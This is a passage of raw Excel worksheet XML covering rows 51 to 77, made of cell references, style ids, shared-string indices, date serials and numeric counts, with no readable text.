      <c r="G51" s="95" t="s">
        <v>299</v>
      </c>
      <c r="H51" t="s">
        <v>307</v>
      </c>
      <c r="I51" t="s">
        <v>156</v>
      </c>
      <c r="J51" s="95" t="s">
        <v>226</v>
      </c>
      <c r="K51" s="95" t="s">
        <v>27</v>
      </c>
      <c r="L51" t="s">
        <v>77</v>
      </c>
      <c r="M51" s="95" t="s">
        <v>308</v>
      </c>
      <c r="N51" t="s">
        <v>309</v>
      </c>
      <c r="Q51" s="95" t="s">
        <v>310</v>
      </c>
      <c r="R51">
        <v>6173</v>
      </c>
      <c r="S51">
        <v>6520</v>
      </c>
      <c r="T51">
        <v>2679</v>
      </c>
      <c r="U51">
        <v>3226</v>
      </c>
      <c r="V51">
        <v>1719</v>
      </c>
      <c r="W51" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="52" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A52" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B52" s="52">
        <v>44684.726985428242</v>
      </c>
      <c r="C52" s="95" t="s">
        <v>311</v>
      </c>
      <c r="D52" s="96">
        <v>100</v>
      </c>
      <c r="E52" s="95" t="s">
        <v>312</v>
      </c>
      <c r="F52" s="42">
        <v>100</v>
      </c>
      <c r="G52" s="95" t="s">
        <v>313</v>
      </c>
      <c r="H52" t="s">
        <v>314</v>
      </c>
      <c r="I52" t="s">
        <v>210</v>
      </c>
      <c r="J52" s="95" t="s">
        <v>211</v>
      </c>
      <c r="K52" s="95" t="s">
        <v>11</v>
      </c>
      <c r="L52" t="s">
        <v>77</v>
      </c>
      <c r="M52" s="95" t="s">
        <v>315</v>
      </c>
      <c r="N52" t="s">
        <v>316</v>
      </c>
      <c r="Q52" s="95" t="s">
        <v>317</v>
      </c>
      <c r="T52">
        <v>144</v>
      </c>
      <c r="U52">
        <v>8</v>
      </c>
      <c r="V52">
        <v>125</v>
      </c>
      <c r="W52" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="53" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A53" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B53" s="52">
        <v>44684.726985451387</v>
      </c>
      <c r="C53" s="95" t="s">
        <v>311</v>
      </c>
      <c r="D53" s="96">
        <v>100</v>
      </c>
      <c r="E53" s="95" t="s">
        <v>318</v>
      </c>
      <c r="F53" s="42">
        <v>100</v>
      </c>
      <c r="G53" s="95" t="s">
        <v>319</v>
      </c>
      <c r="H53" t="s">
        <v>320</v>
      </c>
      <c r="I53" t="s">
        <v>210</v>
      </c>
      <c r="J53" s="95" t="s">
        <v>211</v>
      </c>
      <c r="K53" s="95" t="s">
        <v>11</v>
      </c>
      <c r="L53" t="s">
        <v>77</v>
      </c>
      <c r="M53" s="95" t="s">
        <v>315</v>
      </c>
      <c r="N53" t="s">
        <v>316</v>
      </c>
      <c r="Q53" s="95" t="s">
        <v>317</v>
      </c>
      <c r="V53">
        <v>18</v>
      </c>
      <c r="W53" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="54" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A54" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B54" s="52">
        <v>44684.726985439818</v>
      </c>
      <c r="C54" s="95" t="s">
        <v>311</v>
      </c>
      <c r="D54" s="96">
        <v>100</v>
      </c>
      <c r="E54" s="95" t="s">
        <v>321</v>
      </c>
      <c r="F54" s="42">
        <v>100</v>
      </c>
      <c r="G54" s="95" t="s">
        <v>322</v>
      </c>
      <c r="H54" t="s">
        <v>323</v>
      </c>
      <c r="I54" t="s">
        <v>210</v>
      </c>
      <c r="J54" s="95" t="s">
        <v>211</v>
      </c>
      <c r="K54" s="95" t="s">
        <v>11</v>
      </c>
      <c r="L54" t="s">
        <v>77</v>
      </c>
      <c r="M54" s="95" t="s">
        <v>315</v>
      </c>
      <c r="N54" t="s">
        <v>316</v>
      </c>
      <c r="Q54" s="95" t="s">
        <v>317</v>
      </c>
      <c r="T54">
        <v>2</v>
      </c>
      <c r="V54">
        <v>35</v>
      </c>
      <c r="W54" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="55" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A55" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B55" s="52">
        <v>44684.726985462963</v>
      </c>
      <c r="C55" s="95" t="s">
        <v>311</v>
      </c>
      <c r="D55" s="96">
        <v>100</v>
      </c>
      <c r="E55" s="95" t="s">
        <v>324</v>
      </c>
      <c r="F55" s="42">
        <v>100</v>
      </c>
      <c r="G55" s="95" t="s">
        <v>325</v>
      </c>
      <c r="H55" t="s">
        <v>326</v>
      </c>
      <c r="I55" t="s">
        <v>210</v>
      </c>
      <c r="J55" s="95" t="s">
        <v>211</v>
      </c>
      <c r="K55" s="95" t="s">
        <v>11</v>
      </c>
      <c r="L55" t="s">
        <v>77</v>
      </c>
      <c r="M55" s="95" t="s">
        <v>315</v>
      </c>
      <c r="N55" t="s">
        <v>316</v>
      </c>
      <c r="Q55" s="95" t="s">
        <v>317</v>
      </c>
      <c r="V55">
        <v>25</v>
      </c>
      <c r="W55" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="56" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A56" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B56" s="52">
        <v>44684.726985474539</v>
      </c>
      <c r="C56" s="95" t="s">
        <v>311</v>
      </c>
      <c r="D56" s="96">
        <v>100</v>
      </c>
      <c r="E56" s="95" t="s">
        <v>327</v>
      </c>
      <c r="F56" s="42">
        <v>100</v>
      </c>
      <c r="G56" s="95" t="s">
        <v>328</v>
      </c>
      <c r="H56" t="s">
        <v>329</v>
      </c>
      <c r="I56" t="s">
        <v>210</v>
      </c>
      <c r="J56" s="95" t="s">
        <v>211</v>
      </c>
      <c r="K56" s="95" t="s">
        <v>11</v>
      </c>
      <c r="L56" t="s">
        <v>77</v>
      </c>
      <c r="M56" s="95" t="s">
        <v>315</v>
      </c>
      <c r="N56" t="s">
        <v>316</v>
      </c>
      <c r="Q56" s="95" t="s">
        <v>317</v>
      </c>
      <c r="V56">
        <v>8</v>
      </c>
      <c r="W56" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="57" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A57" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B57" s="52">
        <v>44684.726985497684</v>
      </c>
      <c r="C57" s="95" t="s">
        <v>311</v>
      </c>
      <c r="D57" s="96">
        <v>100</v>
      </c>
      <c r="E57" s="95" t="s">
        <v>330</v>
      </c>
      <c r="F57" s="42">
        <v>100</v>
      </c>
      <c r="G57" s="95" t="s">
        <v>331</v>
      </c>
      <c r="H57" t="s">
        <v>332</v>
      </c>
      <c r="I57" t="s">
        <v>210</v>
      </c>
      <c r="J57" s="95" t="s">
        <v>211</v>
      </c>
      <c r="K57" s="95" t="s">
        <v>11</v>
      </c>
      <c r="L57" t="s">
        <v>77</v>
      </c>
      <c r="M57" s="95" t="s">
        <v>315</v>
      </c>
      <c r="N57" t="s">
        <v>316</v>
      </c>
      <c r="Q57" s="95" t="s">
        <v>317</v>
      </c>
      <c r="V57">
        <v>2</v>
      </c>
      <c r="W57" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="58" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A58" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B58" s="52">
        <v>44622.64242405093</v>
      </c>
      <c r="C58" s="95" t="s">
        <v>333</v>
      </c>
      <c r="D58" s="96">
        <v>100</v>
      </c>
      <c r="E58" s="95" t="s">
        <v>334</v>
      </c>
      <c r="F58" s="42">
        <v>100</v>
      </c>
      <c r="G58" s="95" t="s">
        <v>335</v>
      </c>
      <c r="H58" t="s">
        <v>336</v>
      </c>
      <c r="I58" t="s">
        <v>75</v>
      </c>
      <c r="J58" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K58" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L58" t="s">
        <v>77</v>
      </c>
      <c r="M58" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N58" t="s">
        <v>91</v>
      </c>
      <c r="Q58" s="95" t="s">
        <v>337</v>
      </c>
      <c r="R58">
        <v>50</v>
      </c>
      <c r="S58">
        <v>36796</v>
      </c>
      <c r="T58">
        <v>35561</v>
      </c>
      <c r="U58">
        <v>27151</v>
      </c>
      <c r="V58">
        <v>46125</v>
      </c>
      <c r="W58" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="59" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A59" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B59" s="52">
        <v>44722.466576481478</v>
      </c>
      <c r="C59" s="95" t="s">
        <v>333</v>
      </c>
      <c r="D59" s="96">
        <v>100</v>
      </c>
      <c r="E59" s="95" t="s">
        <v>338</v>
      </c>
      <c r="F59" s="42">
        <v>100</v>
      </c>
      <c r="G59" s="95" t="s">
        <v>339</v>
      </c>
      <c r="H59" t="s">
        <v>340</v>
      </c>
      <c r="I59" t="s">
        <v>75</v>
      </c>
      <c r="J59" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K59" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L59" t="s">
        <v>77</v>
      </c>
      <c r="M59" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N59" t="s">
        <v>91</v>
      </c>
      <c r="O59" s="95" t="s">
        <v>341</v>
      </c>
      <c r="Q59" s="95" t="s">
        <v>337</v>
      </c>
      <c r="U59">
        <v>17</v>
      </c>
      <c r="V59">
        <v>6</v>
      </c>
      <c r="W59" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="60" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A60" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B60" s="52">
        <v>44447.490985370372</v>
      </c>
      <c r="C60" s="95" t="s">
        <v>342</v>
      </c>
      <c r="D60" s="96">
        <v>160</v>
      </c>
      <c r="E60" s="95" t="s">
        <v>343</v>
      </c>
      <c r="F60" s="42">
        <v>120</v>
      </c>
      <c r="G60" s="95" t="s">
        <v>344</v>
      </c>
      <c r="H60" t="s">
        <v>345</v>
      </c>
      <c r="I60" t="s">
        <v>75</v>
      </c>
      <c r="J60" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K60" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L60" t="s">
        <v>77</v>
      </c>
      <c r="M60" s="95" t="s">
        <v>237</v>
      </c>
      <c r="N60" t="s">
        <v>238</v>
      </c>
      <c r="Q60" s="95" t="s">
        <v>346</v>
      </c>
      <c r="R60">
        <v>1803</v>
      </c>
      <c r="S60">
        <v>2137</v>
      </c>
      <c r="T60">
        <v>2203</v>
      </c>
      <c r="U60">
        <v>1251</v>
      </c>
      <c r="V60">
        <v>165</v>
      </c>
      <c r="W60" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="61" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A61" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B61" s="52">
        <v>44511.693646087966</v>
      </c>
      <c r="C61" s="95" t="s">
        <v>342</v>
      </c>
      <c r="D61" s="96">
        <v>160</v>
      </c>
      <c r="E61" s="95" t="s">
        <v>347</v>
      </c>
      <c r="F61" s="42">
        <v>100</v>
      </c>
      <c r="G61" s="95" t="s">
        <v>348</v>
      </c>
      <c r="H61" t="s">
        <v>349</v>
      </c>
      <c r="I61" t="s">
        <v>75</v>
      </c>
      <c r="J61" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K61" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L61" t="s">
        <v>77</v>
      </c>
      <c r="M61" s="95" t="s">
        <v>237</v>
      </c>
      <c r="N61" t="s">
        <v>238</v>
      </c>
      <c r="O61" s="95" t="s">
        <v>350</v>
      </c>
      <c r="Q61" s="95" t="s">
        <v>346</v>
      </c>
      <c r="R61">
        <v>109</v>
      </c>
      <c r="U61">
        <v>10</v>
      </c>
      <c r="V61">
        <v>21</v>
      </c>
      <c r="W61" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="62" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A62" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B62" s="52">
        <v>44503.827030671295</v>
      </c>
      <c r="C62" s="95" t="s">
        <v>342</v>
      </c>
      <c r="D62" s="96">
        <v>160</v>
      </c>
      <c r="E62" s="95" t="s">
        <v>351</v>
      </c>
      <c r="F62" s="42">
        <v>110</v>
      </c>
      <c r="G62" s="95" t="s">
        <v>352</v>
      </c>
      <c r="H62" t="s">
        <v>353</v>
      </c>
      <c r="I62" t="s">
        <v>75</v>
      </c>
      <c r="J62" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K62" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L62" t="s">
        <v>77</v>
      </c>
      <c r="M62" s="95" t="s">
        <v>237</v>
      </c>
      <c r="N62" t="s">
        <v>238</v>
      </c>
      <c r="Q62" s="95" t="s">
        <v>346</v>
      </c>
      <c r="R62">
        <v>2</v>
      </c>
      <c r="U62">
        <v>24</v>
      </c>
      <c r="V62">
        <v>2</v>
      </c>
      <c r="W62" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="63" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A63" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B63" s="52">
        <v>44503.827030682871</v>
      </c>
      <c r="C63" s="95" t="s">
        <v>342</v>
      </c>
      <c r="D63" s="96">
        <v>160</v>
      </c>
      <c r="E63" s="95" t="s">
        <v>354</v>
      </c>
      <c r="F63" s="42">
        <v>101</v>
      </c>
      <c r="G63" s="95" t="s">
        <v>355</v>
      </c>
      <c r="H63" t="s">
        <v>356</v>
      </c>
      <c r="I63" t="s">
        <v>75</v>
      </c>
      <c r="J63" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K63" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L63" t="s">
        <v>77</v>
      </c>
      <c r="M63" s="95" t="s">
        <v>237</v>
      </c>
      <c r="N63" t="s">
        <v>238</v>
      </c>
      <c r="Q63" s="95" t="s">
        <v>346</v>
      </c>
      <c r="R63">
        <v>225</v>
      </c>
      <c r="S63">
        <v>474</v>
      </c>
      <c r="T63">
        <v>387</v>
      </c>
      <c r="U63">
        <v>253</v>
      </c>
      <c r="V63">
        <v>236</v>
      </c>
      <c r="W63" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="64" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A64" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B64" s="52">
        <v>44161.580590034719</v>
      </c>
      <c r="C64" s="95" t="s">
        <v>357</v>
      </c>
      <c r="D64" s="96">
        <v>100</v>
      </c>
      <c r="E64" s="95" t="s">
        <v>358</v>
      </c>
      <c r="F64" s="42">
        <v>100</v>
      </c>
      <c r="G64" s="95" t="s">
        <v>359</v>
      </c>
      <c r="H64" t="s">
        <v>360</v>
      </c>
      <c r="I64" t="s">
        <v>75</v>
      </c>
      <c r="J64" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K64" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L64" t="s">
        <v>77</v>
      </c>
      <c r="M64" s="95" t="s">
        <v>237</v>
      </c>
      <c r="N64" t="s">
        <v>238</v>
      </c>
      <c r="O64" s="95" t="s">
        <v>361</v>
      </c>
      <c r="Q64" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W64" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="65" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A65" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B65" s="52">
        <v>43971.455569467595</v>
      </c>
      <c r="C65" s="95" t="s">
        <v>362</v>
      </c>
      <c r="D65" s="96">
        <v>100</v>
      </c>
      <c r="E65" s="95" t="s">
        <v>363</v>
      </c>
      <c r="F65" s="42">
        <v>100</v>
      </c>
      <c r="G65" s="95" t="s">
        <v>364</v>
      </c>
      <c r="H65" t="s">
        <v>365</v>
      </c>
      <c r="I65" t="s">
        <v>75</v>
      </c>
      <c r="J65" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K65" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L65" t="s">
        <v>77</v>
      </c>
      <c r="M65" s="95" t="s">
        <v>237</v>
      </c>
      <c r="N65" t="s">
        <v>238</v>
      </c>
      <c r="O65" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q65" s="95" t="s">
        <v>366</v>
      </c>
      <c r="R65">
        <v>363508</v>
      </c>
      <c r="S65">
        <v>451080</v>
      </c>
      <c r="T65">
        <v>548944</v>
      </c>
      <c r="U65">
        <v>268199</v>
      </c>
      <c r="V65">
        <v>301837</v>
      </c>
      <c r="W65" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="66" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A66" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B66" s="52">
        <v>44405.482558391202</v>
      </c>
      <c r="C66" s="95" t="s">
        <v>367</v>
      </c>
      <c r="D66" s="96">
        <v>111</v>
      </c>
      <c r="E66" s="95" t="s">
        <v>368</v>
      </c>
      <c r="F66" s="42">
        <v>100</v>
      </c>
      <c r="G66" s="95" t="s">
        <v>369</v>
      </c>
      <c r="H66" t="s">
        <v>370</v>
      </c>
      <c r="I66" t="s">
        <v>75</v>
      </c>
      <c r="J66" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K66" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L66" t="s">
        <v>77</v>
      </c>
      <c r="M66" s="95" t="s">
        <v>236</v>
      </c>
      <c r="O66" s="95" t="s">
        <v>371</v>
      </c>
      <c r="Q66" s="95" t="s">
        <v>372</v>
      </c>
      <c r="R66">
        <v>15090</v>
      </c>
      <c r="S66">
        <v>13819</v>
      </c>
      <c r="T66">
        <v>12767</v>
      </c>
      <c r="U66">
        <v>13183</v>
      </c>
      <c r="V66">
        <v>13692</v>
      </c>
      <c r="W66" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="67" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A67" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B67" s="52">
        <v>44510.617340069446</v>
      </c>
      <c r="C67" s="95" t="s">
        <v>367</v>
      </c>
      <c r="D67" s="96">
        <v>111</v>
      </c>
      <c r="E67" s="95" t="s">
        <v>373</v>
      </c>
      <c r="F67" s="42">
        <v>101</v>
      </c>
      <c r="G67" s="95" t="s">
        <v>374</v>
      </c>
      <c r="H67" t="s">
        <v>375</v>
      </c>
      <c r="I67" t="s">
        <v>75</v>
      </c>
      <c r="J67" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K67" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L67" t="s">
        <v>77</v>
      </c>
      <c r="M67" s="95" t="s">
        <v>236</v>
      </c>
      <c r="Q67" s="95" t="s">
        <v>372</v>
      </c>
      <c r="R67">
        <v>1246</v>
      </c>
      <c r="S67">
        <v>3347</v>
      </c>
      <c r="T67">
        <v>6518</v>
      </c>
      <c r="U67">
        <v>5956</v>
      </c>
      <c r="V67">
        <v>10336</v>
      </c>
      <c r="W67" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="68" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A68" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B68" s="52">
        <v>44579.824702824073</v>
      </c>
      <c r="C68" s="95" t="s">
        <v>376</v>
      </c>
      <c r="D68" s="96">
        <v>132</v>
      </c>
      <c r="E68" s="95" t="s">
        <v>377</v>
      </c>
      <c r="F68" s="42">
        <v>102</v>
      </c>
      <c r="G68" s="95" t="s">
        <v>378</v>
      </c>
      <c r="H68" t="s">
        <v>379</v>
      </c>
      <c r="I68" t="s">
        <v>75</v>
      </c>
      <c r="J68" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K68" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L68" t="s">
        <v>77</v>
      </c>
      <c r="M68" s="95" t="s">
        <v>236</v>
      </c>
      <c r="O68" s="95" t="s">
        <v>380</v>
      </c>
      <c r="Q68" s="95" t="s">
        <v>381</v>
      </c>
      <c r="R68">
        <v>3</v>
      </c>
      <c r="S68">
        <v>12</v>
      </c>
      <c r="T68">
        <v>57</v>
      </c>
      <c r="U68">
        <v>41</v>
      </c>
      <c r="W68" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="69" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A69" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B69" s="52">
        <v>44494.933607407409</v>
      </c>
      <c r="C69" s="95" t="s">
        <v>376</v>
      </c>
      <c r="D69" s="96">
        <v>132</v>
      </c>
      <c r="E69" s="95" t="s">
        <v>382</v>
      </c>
      <c r="F69" s="42">
        <v>120</v>
      </c>
      <c r="G69" s="95" t="s">
        <v>383</v>
      </c>
      <c r="H69" t="s">
        <v>384</v>
      </c>
      <c r="I69" t="s">
        <v>75</v>
      </c>
      <c r="J69" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K69" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L69" t="s">
        <v>77</v>
      </c>
      <c r="M69" s="95" t="s">
        <v>236</v>
      </c>
      <c r="O69" s="95" t="s">
        <v>385</v>
      </c>
      <c r="Q69" s="95" t="s">
        <v>381</v>
      </c>
      <c r="S69">
        <v>1</v>
      </c>
      <c r="T69">
        <v>1</v>
      </c>
      <c r="V69">
        <v>2</v>
      </c>
      <c r="W69" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="70" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A70" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B70" s="52">
        <v>44405.538274456019</v>
      </c>
      <c r="C70" s="95" t="s">
        <v>376</v>
      </c>
      <c r="D70" s="96">
        <v>132</v>
      </c>
      <c r="E70" s="95" t="s">
        <v>386</v>
      </c>
      <c r="F70" s="42">
        <v>120</v>
      </c>
      <c r="G70" s="95" t="s">
        <v>387</v>
      </c>
      <c r="H70" t="s">
        <v>388</v>
      </c>
      <c r="I70" t="s">
        <v>75</v>
      </c>
      <c r="J70" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K70" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L70" t="s">
        <v>77</v>
      </c>
      <c r="M70" s="95" t="s">
        <v>236</v>
      </c>
      <c r="O70" s="95" t="s">
        <v>389</v>
      </c>
      <c r="Q70" s="95" t="s">
        <v>381</v>
      </c>
      <c r="W70" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="71" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A71" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B71" s="52"/>
      <c r="C71" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D71" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E71" s="95" t="s">
        <v>390</v>
      </c>
      <c r="F71" s="42">
        <v>100</v>
      </c>
      <c r="G71" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H71" t="s">
        <v>391</v>
      </c>
      <c r="I71" t="s">
        <v>103</v>
      </c>
      <c r="J71" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K71" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L71" t="s">
        <v>77</v>
      </c>
      <c r="M71" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P71" t="s">
        <v>246</v>
      </c>
      <c r="Q71" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W71" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="72" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A72" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B72" s="52"/>
      <c r="C72" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D72" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E72" s="95" t="s">
        <v>392</v>
      </c>
      <c r="F72" s="42">
        <v>200</v>
      </c>
      <c r="G72" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H72" t="s">
        <v>393</v>
      </c>
      <c r="I72" t="s">
        <v>103</v>
      </c>
      <c r="J72" s="95" t="s">
        <v>104</v>
      </c>
      <c r="K72" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L72" t="s">
        <v>77</v>
      </c>
      <c r="M72" s="95" t="s">
        <v>104</v>
      </c>
      <c r="P72" t="s">
        <v>246</v>
      </c>
      <c r="Q72" s="95" t="s">
        <v>247</v>
      </c>
      <c r="W72" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="73" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A73" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B73" s="52"/>
      <c r="C73" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D73" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E73" s="95" t="s">
        <v>394</v>
      </c>
      <c r="F73" s="42">
        <v>100</v>
      </c>
      <c r="G73" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H73" t="s">
        <v>395</v>
      </c>
      <c r="I73" t="s">
        <v>75</v>
      </c>
      <c r="J73" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K73" s="95" t="s">
        <v>19</v>
      </c>
      <c r="L73" t="s">
        <v>77</v>
      </c>
      <c r="M73" s="95" t="s">
        <v>76</v>
      </c>
      <c r="P73" t="s">
        <v>78</v>
      </c>
      <c r="Q73" s="95" t="s">
        <v>396</v>
      </c>
      <c r="W73" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="74" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A74" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B74" s="52">
        <v>44336.619851631942</v>
      </c>
      <c r="C74" s="95" t="s">
        <v>397</v>
      </c>
      <c r="D74" s="96">
        <v>100</v>
      </c>
      <c r="E74" s="95" t="s">
        <v>398</v>
      </c>
      <c r="F74" s="42">
        <v>100</v>
      </c>
      <c r="G74" s="95" t="s">
        <v>399</v>
      </c>
      <c r="H74" t="s">
        <v>400</v>
      </c>
      <c r="I74" t="s">
        <v>172</v>
      </c>
      <c r="J74" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K74" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L74" t="s">
        <v>83</v>
      </c>
      <c r="M74" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N74" t="s">
        <v>174</v>
      </c>
      <c r="Q74" s="95" t="s">
        <v>401</v>
      </c>
      <c r="R74">
        <v>106853</v>
      </c>
      <c r="S74">
        <v>142489</v>
      </c>
      <c r="T74">
        <v>192460</v>
      </c>
      <c r="U74">
        <v>201563</v>
      </c>
      <c r="V74">
        <v>202867</v>
      </c>
      <c r="W74" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="75" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A75" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B75" s="52">
        <v>44415.434837361114</v>
      </c>
      <c r="C75" s="95" t="s">
        <v>402</v>
      </c>
      <c r="D75" s="96">
        <v>101</v>
      </c>
      <c r="E75" s="95" t="s">
        <v>403</v>
      </c>
      <c r="F75" s="42">
        <v>101</v>
      </c>
      <c r="G75" s="95" t="s">
        <v>404</v>
      </c>
      <c r="H75" t="s">
        <v>405</v>
      </c>
      <c r="I75" t="s">
        <v>172</v>
      </c>
      <c r="J75" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K75" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L75" t="s">
        <v>77</v>
      </c>
      <c r="M75" s="95" t="s">
        <v>406</v>
      </c>
      <c r="N75" t="s">
        <v>407</v>
      </c>
      <c r="Q75" s="95" t="s">
        <v>408</v>
      </c>
      <c r="R75">
        <v>26999459</v>
      </c>
      <c r="S75">
        <v>87794372</v>
      </c>
      <c r="T75">
        <v>87155684</v>
      </c>
      <c r="U75">
        <v>88695635</v>
      </c>
      <c r="V75">
        <v>103033730</v>
      </c>
      <c r="W75" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="76" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A76" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B76" s="52">
        <v>44473.722917141204</v>
      </c>
      <c r="C76" s="95" t="s">
        <v>409</v>
      </c>
      <c r="D76" s="96">
        <v>111</v>
      </c>
      <c r="E76" s="95" t="s">
        <v>410</v>
      </c>
      <c r="F76" s="42">
        <v>102</v>
      </c>
      <c r="G76" s="95" t="s">
        <v>411</v>
      </c>
      <c r="H76" t="s">
        <v>412</v>
      </c>
      <c r="I76" t="s">
        <v>172</v>
      </c>
      <c r="J76" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K76" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L76" t="s">
        <v>77</v>
      </c>
      <c r="M76" s="95" t="s">
        <v>406</v>
      </c>
      <c r="N76" t="s">
        <v>407</v>
      </c>
      <c r="Q76" s="95" t="s">
        <v>413</v>
      </c>
      <c r="R76">
        <v>14794</v>
      </c>
      <c r="S76">
        <v>14917</v>
      </c>
      <c r="T76">
        <v>9655</v>
      </c>
      <c r="U76">
        <v>9689</v>
      </c>
      <c r="V76">
        <v>18352</v>
      </c>
      <c r="W76" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="77" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A77" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B77" s="52">
        <v>44473.722917106483</v>
      </c>
      <c r="C77" s="95" t="s">
        <v>409</v>
      </c>
      <c r="D77" s="96">
        <v>111</v>
      </c>
      <c r="E77" s="95" t="s">
        <v>414</v>
      </c>
      <c r="F77" s="42">
        <v>102</v>
      </c>
      <c r="G77" s="95" t="s">
